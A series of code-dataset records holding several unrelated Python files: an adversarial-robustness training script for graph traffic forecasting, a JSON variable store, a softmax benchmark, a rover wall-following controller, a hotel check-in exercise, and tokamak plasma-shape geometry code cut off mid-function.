loss_criterion(out, y_batch)\n epoch_val_losses.append(loss.detach().cpu().numpy())\n 
val_predict.append(out.detach().cpu().numpy())\n val_target.append(y_batch.detach().cpu().numpy())\n adv_pgd_val_predict.append(adv_pgd_out.detach().cpu().numpy())\n\n val_predict = np.vstack(val_predict)\n val_target = np.vstack(val_target)\n adv_pgd_val_predict = np.vstack(adv_pgd_val_predict)\n\n return sum(epoch_val_losses)/len(epoch_val_losses), val_predict, val_target, adv_pgd_val_predict, index\n\ndef main():\n adj = train_data.A\n A = train_data.A.to(device=args.device)\n A_wave = train_data.A_wave.to(device=args.device)\n\n edges = train_data.edges.to(device=args.device)\n edge_weights = train_data.edge_weights.to(device=args.device)\n max_speed = train_data.max_speed\n\n\n\n if cfgs.backbone == 'STGCN':\n model = STGCN(A_wave.shape[0],\n cfgs.num_features,\n cfgs.num_timesteps_input,\n cfgs.num_timesteps_output).to(device=args.device)\n elif cfgs.backbone == 'ASTGCN':\n model_params = {\n 'nb_time_strides': 1,\n 'nb_block': 2,\n 'K': 3,\n 'nb_chev_filter': 64,\n 'nb_time_filter': 64}\n\n model = ASTGCN(\n nb_block= model_params['nb_block'],\n in_channels = cfgs.num_features,\n K = model_params['K'],\n nb_chev_filter = model_params['nb_chev_filter'],\n nb_time_filter = model_params['nb_time_filter'],\n time_strides = model_params['nb_time_strides'],\n num_for_predict = cfgs.num_timesteps_output,\n len_input = cfgs.num_timesteps_input,\n num_of_vertices = A_wave.shape[0],\n normalization = None,\n bias = True,\n ).to(device=args.device)\n elif cfgs.backbone == 'GWNET':\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 32\n model = gwnet(device, num_nodes=cfgs.num_nodes, dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features, out_dim=cfgs.num_timesteps_output,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n\n else:\n raise NameError\n\n policy_online_method_lists = [\"AT_policy_atten\"]\n policy_offine_method_lists = [\"AT_policy_atten_offine\", \"AT_policy_atten_dist_offline\"]\n\n if cfgs.train_mode in policy_online_method_lists:\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 4\n victim_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n policynet = STPolicyAttentionNet(victim_nodes = victim_nodes,device = device, num_nodes=cfgs.num_nodes, dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features, out_dim=cfgs.hidden_embedding_dims,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n policy_optimizer = torch.optim.Adam(policynet.parameters(), lr=1e-3)\n elif cfgs.train_mode in policy_offine_method_lists:\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 4\n victim_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n policynet = STPolicyAttentionNet(victim_nodes=victim_nodes, device=device, num_nodes=cfgs.num_nodes,\n dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features,\n out_dim=cfgs.hidden_embedding_dims,\n residual_channels=nhid, dilation_channels=nhid, skip_channels=nhid * 8,\n end_channels=nhid * 16).to(device=args.device)\n policy_optimizer = None\n load_path = cfgs.policynet_path\n logger.info('Loading checkpoint from %s for policynet', load_path)\n 
policynet.load_state_dict(torch.load(load_path))\n\n else:\n\n policynet, policy_optimizer = None, None\n\n if args.mode == \"TRAIN\":\n load_path = None\n if cfgs.load_model is not None:\n load_path = cfgs.load_model\n\n elif cfgs.resume_epoch > 0:\n load_path = os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.resume_epoch))\n if load_path is not None:\n assert os.path.exists(load_path), load_path\n logger.info('Loading checkpoint from %s', load_path)\n model.load_state_dict(torch.load(load_path))\n\n\n\n\n\n\n # init loss function, optimizer\n if cfgs.loss_func == 'mae':\n loss_criterion = torch.nn.L1Loss().to(args.device)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.03, eps=1.0e-8,\n weight_decay=0, amsgrad=False)\n elif cfgs.loss_func == 'mse':\n loss_criterion = torch.nn.MSELoss().to(args.device)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n else:\n raise ValueError\n\n\n\n\n training_losses = []\n validation_losses = []\n validation_maes = []\n rewarding = []\n start_epoch = cfgs.resume_epoch + 1\n wait = 0\n val_loss_min = np.inf\n total_start = time.time()\n #print('========================start to training===========================')\n for epoch in range(start_epoch, cfgs.epochs + 1):\n\n if cfgs.dropout_type == 'none_dropout':\n A_wave, edges, edge_weights = A_wave, edges, edge_weights\n\n else:\n raise NameError\n\n\n if wait >= cfgs.patience and epoch >= cfgs.minimum_epoch:\n logger.info('early stop at epoch: %04d' % (epoch))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch_last.pt'))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.minimum_epoch)))\n break\n if epoch == (cfgs.minimum_epoch -1):\n logger.info('save model at epoch: %04d' % (epoch))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(cfgs.minimum_epoch-1)))\n\n train_loss, val_loss, mae_score,train_reward = train(epoch, logger,train_loader,val_loader, model,optimizer, policynet, policy_optimizer,A_wave, A, loss_criterion, max_speed, edges, edge_weights)\n training_losses.append(train_loss)\n validation_losses.append(val_loss)\n validation_maes.append(mae_score)\n\n\n if val_loss <= val_loss_min:\n logger.info(\n 'val loss decrease from %.4f to %.4f, saving model to %s ' %\n (val_loss_min, val_loss, cfgs.model_dir))\n wait = 0\n val_loss_min = val_loss\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(epoch)))\n torch.save(model.state_dict(),\n os.path.join(cfgs.model_dir, 'best_epoch.pt'))\n logger.info('best model at epoch: %04d' % (epoch))\n else:\n wait += 1\n\n with open(cfgs.model_dir+\"/losses.pk\", \"wb\") as fd:\n pk.dump((training_losses, validation_losses, validation_maes), fd)\n\n logger_info(logger, distributed, 'Val Clean MAE: {:.4f}'.format(validation_maes[-1]))\n logger_info(logger, distributed, '[Remarks] {} | End of training, saved at {}'.format(cfgs.remark, cfgs.model_dir))\n logger_info(logger, distributed, 'Total training time:{:.3f}'.format(time.time() - total_start))\n elif args.mode == 'TEST':\n if cfgs.loss_func == 'mae':\n loss_criterion = torch.nn.L1Loss().to(args.device)\n elif cfgs.loss_func == 'mse':\n loss_criterion = torch.nn.MSELoss().to(args.device)\n else:\n raise ValueError\n load_path = cfgs.model_path\n logger.info('Loading checkpoint from %s', load_path)\n model.load_state_dict(torch.load(load_path))\n\n model.eval()\n _, test_clean_predict, test_target, test_adv_predict, index = eval_val_pgd(test_loader, model, 
A_wave, A, edges,\n edge_weights, loss_criterion, max_speed,\n cfgs)\n\n test_adv_predict, test_target = test_adv_predict * max_speed, test_target * max_speed\n test_adv_mae_score = mae(test_adv_predict, test_target)\n\n test_clean_predict = test_clean_predict * max_speed\n test_clean_mae_score = mae(test_clean_predict, test_target)\n\n logger_info(logger, distributed,\n 'Test Clean MAE: {:.4f} Test Adv MAE:{:.4f}'.format(test_clean_mae_score, test_adv_mae_score))\n logger_info(logger, distributed,\n '[Remarks] {} | End of training, saved at {}'.format(cfgs.remark, cfgs.model_dir))\nif __name__ == '__main__':\n main()\n","repo_name":"usail-hkust/RDAT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":25417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"38678797969","text":"import json\nimport os\n\nfrom systems.logger import log, debug_on\n\n\nclass VarManager:\n def __init__(self):\n self.varpath = \"./data/etc/vars.json\"\n\n def write(self, varname, varvalue):\n # added this to make sure the vars file exists for adding the first entry\n vardata = {varname: varvalue}\n if not os.path.exists(self.varpath):\n self.write_json(self.varpath, vardata)\n\n # open var file and add entry\n with open(self.varpath, \"r\") as f:\n data = json.load(f)\n data[varname] = varvalue\n self.write_json(self.varpath, data)\n\n def read(self, varname):\n with open(self.varpath, \"r\") as f:\n data = json.load(f)\n if varname in data:\n return data[varname]\n else:\n log(f'[ERROR] {varname} does not exist in vars.json')\n return None\n # raise ValueError(f'{varname} does not exist in vars.json')\n\n def write_json(self, filepath, data):\n with open(filepath, \"w\") as f:\n json.dump(data, f, indent=4)\n","repo_name":"matte54/ProjectReggie","sub_path":"systems/varmanager.py","file_name":"varmanager.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30995404769","text":"import torch\nimport torch.nn as nn\nimport time\n\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n \n def forward(self, x):\n x = nn.functional.softmax(x, dim=-1)\n return x\n\n\ndef perf():\n # self-attention softmax performance\n batch_size = 256\n num_attention_heads = 12\n seq_length = 7\n steps = 1000\n\n x = torch.randn((batch_size, num_attention_heads, seq_length, seq_length))\n\n model = Net()\n\n # model = torch.compile(model)\n\n y = model(x)\n\n t0 = time.time()\n for _ in range(steps):\n model(x)\n origin_time = time.time() - t0\n\n if not hasattr(torch, 'set_extra_optimization'):\n print(\"no set_extra_optimization\")\n \n torch.set_extra_optimization(True)\n t0 = time.time()\n for _ in range(steps):\n model(x)\n opt_time = time.time() - t0\n\n print(origin_time, opt_time)\n scale = origin_time / opt_time\n print(scale)\n\n\ndef check():\n x = torch.randn((3, 7))\n y1 = nn.functional.softmax(x, dim=-1)\n # print(y1)\n\n if hasattr(torch, 'set_extra_optimization'):\n torch.set_extra_optimization(True)\n y2 = nn.functional.softmax(x, dim=-1)\n # print(y2)\n diff = torch.abs(y2 - y1).flatten()\n # print(diff)\n # sorted_diff, sorted_indices = torch.sort(diff, descending=True)\n print(torch.sum(diff > 1e-6))\n\n\n# 
check()\nperf()\n","repo_name":"imzhuhl/ml_workloads","sub_path":"pytorch/operator/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32728464236","text":"import time,zmq,pickle\nimport numpy as np\nimport pyrealsense2 as rs\nimport open3d as o3d\nimport pointcloud as pc\nimport vehicle as veh\nimport visualise_pointclouds as visualise\nimport math\nfrom ast import literal_eval\nimport random\nimport os\n\n\ndef calculate_wall_angle(left_z, right_z):\n #TODO: Check this angle calculation is correct.\n delta_x = 2\n delta_y = left_z - right_z\n\n return math.degrees(math.atan2(delta_y, delta_x))\n\n\ndef main():\n \"\"\" \n This method is the heart of the Landrov navigation. \n It handles controling the multi-step navigation. \n The navigation settings can be configured within this.\n \"\"\"\n \n ############ Configuration ##################\n testing = False\n visualising = False\n save_clouds = False\n custom_folder_name = \"testing_side\"\n\n following_side = \"left\" # left or right\n target_distance = 0.4 # Meters\n error_distance = 0.20 # Meters\n error_angle = 10.0 # Degrees\n\n speed = 0.0 # Speed of the vehicle\n turn_speed = 0.5 # Speed * 2 normally\n turn_time_multiplier = 0.0 # Consecutive turns get bigger\n maximum_turns = 10 # Vehicle will stop after turning this many times in a row\n min_points_for_avoidance = 80 # Increase if navigation is disrupted due to noise\n\n # Pointcloud region configuration\n # X\n centerWidth = 5\n rightMinX = centerWidth / 2\n leftMaxX = -rightMinX\n\n # Z\n stopMinZ = 0.0\n stopMaxZ = 1.5\n\n # Y\n minY = -0.6\n maxY = 0.1\n\n # Visualisation region colours37\n mainColour = [1, 0, 0]\n leftColour = [0, 1, 0]\n rightColour = [0, 0, 1]\n\n ############ main loop ##################\n vehicle = veh.Vehicle(\"tcp://192.168.8.106\", \"5556\", \"5557\")\n\n if testing == False:\n vehicle.connect_control()\n print('Connected to vehicle server')\n\n vehicle.set_min_points_for_avoidance(min_points_for_avoidance) \n vehicle.set_following_variables(following_side, target_distance, error_distance, error_angle)\n vehicle.set_control_variables(speed, turn_speed, turn_time_multiplier, maximum_turns)\n\n found_cloud = False\n updated_cloud = False\n\n stopMin = [leftMaxX, minY, stopMinZ]\n stopMax = [rightMinX, maxY, stopMaxZ]\n\n leftMin = [-1, minY, stopMinZ]\n leftMax = [0, maxY, stopMaxZ]\n\n rightMin = [0, minY, stopMinZ]\n rightMax = [1, maxY, stopMaxZ]\n\n custom_folder_name += \"_\" + following_side + \"_\" + str(target_distance) + \"_\" + str(speed) + \"_\" + str(int(time.time()))\n time_start = time.time()\n\n try:\n while 1:\n if (testing):\n # Use saved pointcloud file\n filename = \"1.ply\"\n pcd = o3d.io.read_point_cloud(filename)\n npCloud = np.asarray(pcd.points)\n # Flips points to align with those from the landrov\n offset = np.array([0.5, 0, -0.5])\n pcd = pc.npToPcd(npCloud * np.array([1, -1, -1]) + offset)\n # Simulate delays in recieving pointcloud\n time.sleep(0.1)\n found_cloud = True\n \n if not found_cloud:\n vehicle.connect_pointcloud()\n while not found_cloud:\n if len(zmq.select([vehicle.sensor_socket],[],[],0)[0]):\n topic,buf = vehicle.sensor_socket.recv_multipart()\n if topic == b'pointcloud':\n time_start = time.time()\n np_pcd = np.fromstring(buf, dtype=np.float32)\n num_points = np_pcd.size // 3\n reshaped_pcd = np.resize(np_pcd, (num_points, 3))\n pcd = o3d.geometry.PointCloud()\n pcd.points 
= o3d.utility.Vector3dVector(reshaped_pcd)\n found_cloud = True\n\n vehicle.sensor_socket.close()\n\n else:\n downpcd = pcd.voxel_down_sample(voxel_size=0.01)\n\n cloud = pc.PointCloud(downpcd, mainColour, stopMin, stopMax)\n left = pc.PointCloud(downpcd, leftColour, leftMin, leftMax)\n right = pc.PointCloud(downpcd, rightColour, rightMin, rightMax)\n\n # Print status\n template = \"Points in cloud {}, x1 = {}, x2 = {}\"\n\n print(template.format(len(cloud.pcd.points), len(left.pcd.points), len(right.pcd.points)))\n print(\"Time taken\", round(time.time() - time_start, 2))\n time_start = time.time()\n\n updated_cloud = True\n\n # Display pointclouds\n if (visualising or save_clouds):\n mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.2, origin=[0, 0, 0])\n point_clouds = [mesh_frame, left.pcd, right.pcd]\n\n if visualising:\n visualise.visualise(point_clouds)\n\n left_points = np.asarray(left.pcd.points)\n left_average = np.mean(left_points, axis=0)[2]\n\n right_points = np.asarray(right.pcd.points)\n right_average = np.mean(right_points, axis=0)[2]\n\n average_distance = (left_average + right_average) / 2\n\n print(\"Left average:\", round(left_average, 2))\n print(\"Right average:\", round(right_average, 2))\n print(\"Average distance:\", round(average_distance, 2))\n \n # TODO: Wall angle adjust logic\n\n if average_distance < vehicle.target_distance + vehicle.error_distance and average_distance > vehicle.target_distance - vehicle.error_distance:\n angle = calculate_wall_angle(left_average, right_average)\n print(\"Angle from wall:\", round(angle, 2))\n if angle > (vehicle.error_angle / 2):\n print(\"Angle fix.\")\n vehicle.calculate_travel_time(angle)\n command = \"right\"\n elif angle < (-vehicle.error_angle / 2):\n print(\"Angle fix.\")\n vehicle.calculate_travel_time(angle)\n command = \"left\"\n else:\n print(\"At target distance.\")\n command = \"forward\"\n elif average_distance > vehicle.target_distance:\n print(\"Too far.\")\n vehicle.travel_time = 0.2\n command = \"left\"\n elif average_distance < vehicle.target_distance:\n print(\"Too close.\")\n vehicle.travel_time = 0.2\n command = \"right\"\n else: \n command = \"stop\"\n \n if command == \"left\" or command == \"right\":\n vehicle.turn(command)\n\n print(\"Command:\", command)\n\n if updated_cloud and not testing:\n if command == \"stop\":\n print(\"Landrov cannot find clear path...\")\n print(\"Stopping\")\n vehicle.stop()\n break\n elif command == \"forward\":\n vehicle.reset_turn_counts()\n vehicle.forward()\n print(\"Going Forward\")\n elif command == \"right\":\n print(\"Turn Right\")\n vehicle.turn(\"right\")\n elif command == \"left\":\n print(\"Turn Left\")\n vehicle.turn(\"left\")\n else:\n print(\"No Command\")\n vehicle.stop()\n \n found_cloud = False\n updated_cloud = False\n\n except KeyboardInterrupt:\n print(\"Force Close\")\n if not testing:\n vehicle.stop()\n\nmain()","repo_name":"MaxAndrewNZ/AutonomousNavigation","sub_path":"side_camera_test/side_camera_test.py","file_name":"side_camera_test.py","file_ext":"py","file_size_in_byte":7927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13055773249","text":"hotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n \n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n }\n}\n# using the start hotel above client can check in or check out of hotel\ndef hotel_check():\n check_in = input(\"Hi, please type 
'check in' if checking in or 'check out' if checking out,\")\n    floor_number = str(input('Please enter your floor number:'))\n    room_number = str(input('Please enter your room number'))\n    print(floor_number)\n    print(room_number)\n    \n    # tries the floor number and if floor_number is in hotel it continues; if not it asks if the user wants to retry:\n    try:\n        if floor_number == hotel[floor_number]:\n            pass\n        # if person is checking out, delete their room so others can stay\n        if check_in == 'check out':\n            # ensuring that the room they entered has occupants \n            if hotel[floor_number][room_number]:\n                # delete occupants from room\n                del hotel[floor_number][room_number]\n                print(\"Thank you for checking out! Please come and stay with us again!\")\n                return hotel\n            else:\n                # prints message to inform user that room is vacant\n                print(\"Sorry, that room is already vacant\")\n                # prompt user to see if they want to restart\n                try_again = input(\"Would you like to try again?(yes/no) \")\n                # if they want to restart it prompts first questions again \n                if try_again == 'yes':\n                    hotel_check()\n                # if they don't want to retry it ends the program\n                else:\n                    return\n        elif check_in == 'check in':\n            # if they want to check in we have to make sure the room is empty first by checking if that room exists\n            # if the room isn't in the hotel then the user can check in\n            # this does allow user to enter any room number and this will work as long as it is not occupied\n            if room_number not in hotel[floor_number]:\n                # we ask user for number of occupants to know how many names to ask for\n                number_of_occupants = int(input('Please enter the number of occupants? '))\n                print('You will be prompted to enter the name of each occupant')\n                occupant_list = []\n                # asks for each occupant's name so that we can enter them into the room\n                for i in range(number_of_occupants):\n                    full_name = str(input('Please enter occupants name: ')) \n                    occupant_list.append(full_name)\n                hotel[floor_number][room_number] = occupant_list\n            else:\n                # if the room does show up it is occupied so we let the user know\n                print(\"I'm sorry but that room is already occupied.\")\n                # prompt user to see if they want to restart\n                try_again = input(\"Would you like to try again?(yes/no) \")\n                # if they want to restart it prompts first questions again \n                if try_again == 'yes':\n                    hotel_check()\n                else:\n                    return\n    except KeyError:\n        # if the floor isn't in the hotel we tell the user \n        print('Sorry that is not a valid floor ')\n        # ask user if they want to re-try\n        re_try = input('Would you like to try again?(yes/no) ')\n        # if they want to retry we reprompt them from the start\n        if re_try == 'yes':\n            hotel_check()\n        else:\n            # if they don't want to retry it ends the program\n            return\n    \n    print(hotel) \nhotel_check()\n","repo_name":"Anthony-Moss/python-dictionary-exercises","sub_path":"hotel_mgmt.py","file_name":"hotel_mgmt.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72379242667","text":"import copy\nimport enum\nimport random\nfrom typing import List, Optional, NamedTuple, Tuple, Union\n\nimport dataclasses\nimport numpy as np\nfrom scipy import interpolate\n\nfrom fusion_tcv import named_array\nfrom fusion_tcv import tcv_common\n\n\nclass Point(NamedTuple):\n  \"\"\"A point in r,z coordinates.\"\"\"\n  r: float\n  z: float\n\n  def to_polar(self) -> \"PolarPoint\":\n    return PolarPoint(np.arctan2(self.z, self.r),\n                      np.sqrt(self.r**2 + self.z**2))\n\n  def __neg__(self):\n    return Point(-self.r, -self.z)\n\n  def 
__add__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r + pt_or_val.r, self.z + pt_or_val.z)\n else:\n return Point(self.r + pt_or_val, self.z + pt_or_val)\n\n def __sub__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r - pt_or_val.r, self.z - pt_or_val.z)\n else:\n return Point(self.r - pt_or_val, self.z - pt_or_val)\n\n def __mul__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r * pt_or_val.r, self.z * pt_or_val.z)\n else:\n return Point(self.r * pt_or_val, self.z * pt_or_val)\n\n def __truediv__(self, pt_or_val: Union[\"Point\", float]):\n if isinstance(pt_or_val, Point):\n return Point(self.r / pt_or_val.r, self.z / pt_or_val.z)\n else:\n return Point(self.r / pt_or_val, self.z / pt_or_val)\n\n __div__ = __truediv__\n\n\ndef dist(p1: Union[Point, np.ndarray], p2: Union[Point, np.ndarray]) -> float:\n return np.hypot(*(p1 - p2))\n\n\nShapePoints = List[Point]\n\n\ndef to_shape_points(array: np.ndarray) -> ShapePoints:\n return [Point(r, z) for r, z in array]\n\n\ndef center_point(points: ShapePoints) -> Point:\n return sum(points, Point(0, 0)) / len(points)\n\n\nclass ShapeSide(enum.Enum):\n LEFT = 0\n RIGHT = 1\n NOSHIFT = 2\n\n\nclass PolarPoint(NamedTuple):\n angle: float\n dist: float\n\n def to_point(self) -> Point:\n return Point(np.cos(self.angle) * self.dist, np.sin(self.angle) * self.dist)\n\n\ndef evenly_spaced_angles(num: int):\n return np.arange(num) * 2 * np.pi / num\n\n\ndef angle_aligned_dists(points: np.ndarray, angles: np.ndarray) -> np.ndarray:\n \"\"\"Return a new set of points along angles that intersect with the shape.\"\"\"\n # TODO(tewalds): Walk the two arrays together for an O(n+m) algorithm instead\n # of the current O(n*m). 
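  # One possible shape for that O(n+m) walk (an untested sketch, assuming the\n  # query angles are also sorted): keep a single cursor j into points and, for\n  # each angle a in turn, advance j until segment (points[j], points[j+1])\n  # brackets a, then record that segment's ray-intersection distance.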
This would work as long as they are both sorted\n # around the radial direction, so the next intersection will be near the last.\n return np.array([dist_angle_to_surface(points, a) for a in angles])\n\n\ndef angle_aligned_points(points: np.ndarray, num_points: int,\n origin: Point) -> np.ndarray:\n \"\"\"Given a set of points, return a new space centered at origin.\"\"\"\n angles = evenly_spaced_angles(num_points)\n dists = angle_aligned_dists(points - origin, angles)\n return np.stack((np.cos(angles) * dists,\n np.sin(angles) * dists), axis=-1) + origin\n\n\ndef dist_angle_to_surface(points: np.ndarray, angle: float) -> float:\n \"\"\"Distance along a ray to the surface defined by a list of points.\"\"\"\n for p1, p2 in zip(points, np.roll(points, 1, axis=0)):\n d = dist_angle_to_segment(p1, p2, angle)\n if d is not None:\n return d\n raise ValueError(f\"Intersecting edge not found for angle: {angle}\")\n\n\ndef dist_angle_to_segment(p1, p2, angle: float) -> Optional[float]:\n \"\"\"Distance along a ray from the origin to a segment defined by two points.\"\"\"\n x0, y0 = p1[0], p1[1]\n x1, y1 = p2[0], p2[1]\n a0, b0 = np.cos(angle), np.sin(angle)\n a1, b1 = 0, 0\n # Segment/segment algorithm inspired by https://stackoverflow.com/q/563198\n denom = (b0 - b1) * (x0 - x1) - (y0 - y1) * (a0 - a1)\n if denom == 0:\n return None # Angle parallel to the segment, so can't intersect.\n xy = (a0 * (y1 - b1) + a1 * (b0 - y1) + x1 * (b1 - b0)) / denom\n eps = 0.00001 # Allow intersecting slightly beyond the endpoints.\n if -eps <= xy <= 1 + eps: # Check it hit the segment, not just the line.\n ab = (y1 * (x0 - a1) + b1 * (x1 - x0) + y0 * (a1 - x1)) / denom\n if ab > 0: # Otherwise it hit in the reverse direction.\n # If ab <= 1 then it's within the segment defined above, but given it's\n # a unit vector with one end at the origin this tells us the distance to\n # the intersection of an infinite ray out from the origin.\n return ab\n return None\n\n\ndef dist_point_to_surface(points: np.ndarray, point: np.ndarray) -> float:\n \"\"\"Distance from a point to the surface defined by a list of points.\"\"\"\n return min(dist_point_to_segment(p1, p2, point)\n for p1, p2 in zip(points, np.roll(points, 1, axis=0)))\n\n\ndef dist_point_to_segment(v: np.ndarray, w: np.ndarray, p: np.ndarray) -> float:\n \"\"\"Return minimum distance between line segment vw and point p.\"\"\"\n # Inspired by: https://stackoverflow.com/a/1501725\n l2 = dist(v, w)**2\n if l2 == 0.0:\n return dist(p, v) # v == w case\n # Consider the line extending the segment, parameterized as v + t (w - v).\n # We find projection of point p onto the line.\n # It falls where t = [(p-v) . 
(w-v)] / |w-v|^2\n # We clamp t from [0,1] to handle points outside the segment vw.\n t = max(0, min(1, np.dot(p - v, w - v) / l2))\n projection = v + t * (w - v) # Projection falls on the segment\n return dist(p, projection)\n\n\ndef sort_by_angle(points: ShapePoints) -> ShapePoints:\n center = sum(points, Point(0, 0)) / len(points)\n return sorted(points, key=lambda p: (p - center).to_polar().angle)\n\n\ndef spline_interpolate_points(\n points: ShapePoints, num_points: int,\n x_points: Optional[ShapePoints] = None) -> ShapePoints:\n \"\"\"Interpolate along a spline to give a smooth evenly spaced shape.\"\"\"\n ends = []\n if x_points:\n # Find the shape points that must allow sharp corners.\n for xp in x_points:\n for i, p in enumerate(points):\n if np.hypot(*(p - xp)) < 0.01:\n ends.append(i)\n\n if not ends:\n # No x-points forcing sharp corners, so use a periodic spline.\n tck, _ = interpolate.splprep(np.array(points + [points[0]]).T, s=0, per=1)\n unew = np.arange(num_points) / num_points\n out = interpolate.splev(unew, tck)\n assert len(out[0]) == num_points\n return sort_by_angle(to_shape_points(np.array(out).T))\n\n # Generate a spline with an shape==x-point at each end.\n new_pts = []\n for i, j in zip(ends, ends[1:] + [ends[0]]):\n pts = points[i:j+1] if i < j else points[i:] + points[:j+1]\n num_segment_points = np.round((len(pts) - 1) / len(points) * num_points)\n unew = np.arange(num_segment_points + 1) / num_segment_points\n tck, _ = interpolate.splprep(np.array(pts).T, s=0)\n out = interpolate.splev(unew, tck)\n new_pts += to_shape_points(np.array(out).T)[:-1]\n if len(new_pts) != num_points:\n raise AssertionError(\n f\"Generated the wrong number of points: {len(new_pts)} != {num_points}\")\n return sort_by_angle(new_pts)\n\n\n@dataclasses.dataclass\nclass ParametrizedShape:\n \"\"\"Describes a target shape from the parameter set.\"\"\"\n r0: float # Where to put the center along the radial axis.\n z0: float # Where to put the center along the vertical axis.\n kappa: float # Elongation of the shape. (0.8, 3)\n delta: float # Triangulation of the shape. (-1, 1)\n radius: float # Radius of the shape (0.22, 2.58)\n lambda_: float # Squareness of the shape. 
Recommend (0, 0)\n side: ShapeSide # Whether and which side to shift the shape to.\n\n @classmethod\n def uniform_random_shape(\n cls,\n r_bounds=(0.8, 0.9),\n z_bounds=(0, 0.2),\n kappa_bounds=(1.0, 1.8), # elongation\n delta_bounds=(-0.5, 0.6), # triangulation\n radius_bounds=(tcv_common.LIMITER_WIDTH / 2 - 0.04,\n tcv_common.LIMITER_WIDTH / 2),\n lambda_bounds=(0, 0), # squareness\n side=(ShapeSide.LEFT, ShapeSide.RIGHT)):\n \"\"\"Return a random shape.\"\"\"\n return cls(\n r0=np.random.uniform(*r_bounds),\n z0=np.random.uniform(*z_bounds),\n kappa=np.random.uniform(*kappa_bounds),\n delta=np.random.uniform(*delta_bounds),\n radius=np.random.uniform(*radius_bounds),\n lambda_=np.random.uniform(*lambda_bounds),\n side=side if isinstance(side, ShapeSide) else random.choice(side))\n\n def gen_points(self, num_points: int) -> Tuple[ShapePoints, Point]:\n \"\"\"Generates a set of shape points, return (points, modified (r0, z0)).\"\"\"\n r0 = self.r0\n z0 = self.z0\n num_warped_points = 32\n points = np.zeros((num_warped_points, 2))\n theta = evenly_spaced_angles(num_warped_points)\n points[:, 0] = r0 + self.radius * np.cos(theta + self.delta * np.sin(theta)\n - self.lambda_ * np.sin(2 * theta))\n points[:, 1] = z0 + self.radius * self.kappa * np.sin(theta)\n if self.side == ShapeSide.LEFT:\n wall_shift = np.min(points[:, 0]) - tcv_common.INNER_LIMITER_R\n points[:, 0] -= wall_shift\n r0 -= wall_shift\n elif self.side == ShapeSide.RIGHT:\n wall_shift = np.max(points[:, 0]) - tcv_common.OUTER_LIMITER_R\n points[:, 0] -= wall_shift\n r0 -= wall_shift\n return (spline_interpolate_points(to_shape_points(points), num_points),\n Point(r0, z0))\n\n\ndef trim_zero_points(points: ShapePoints) -> Optional[ShapePoints]:\n trimmed = [p for p in points if p.r != 0]\n return trimmed if trimmed else None\n\n\nclass Diverted(enum.Enum):\n \"\"\"Whether a shape is diverted or not.\"\"\"\n ANY = 0\n LIMITED = 1\n DIVERTED = 2\n\n @classmethod\n def from_refs(cls, references: named_array.NamedArray) -> \"Diverted\":\n diverted = (references[\"diverted\", 0] == 1)\n limited = (references[\"limited\", 0] == 1)\n if diverted and limited:\n raise ValueError(\"Diverted and limited doesn't make sense.\")\n if diverted:\n return cls.DIVERTED\n if limited:\n return cls.LIMITED\n return cls.ANY\n\n\n@dataclasses.dataclass\nclass Shape:\n \"\"\"Full specification of a shape.\"\"\"\n params: Optional[ParametrizedShape] = None\n points: Optional[ShapePoints] = None\n x_points: Optional[ShapePoints] = None\n legs: Optional[ShapePoints] = None\n diverted: Diverted = Diverted.ANY\n ip: Optional[float] = None\n limit_point: Optional[Point] = None\n\n @classmethod\n def from_references(cls, references: named_array.NamedArray) -> \"Shape\":\n \"\"\"Extract a Shape from the references.\"\"\"\n if any(np.any(references[name] != 0)\n for name in (\"R\", \"Z\", \"kappa\", \"delta\", \"radius\", \"lambda\")):\n params = ParametrizedShape(\n r0=references[\"R\"][0],\n z0=references[\"Z\"][0],\n kappa=references[\"kappa\"][0],\n delta=references[\"delta\"][0],\n radius=references[\"radius\"][0],\n lambda_=references[\"lambda\"][0],\n side=ShapeSide.NOSHIFT)\n 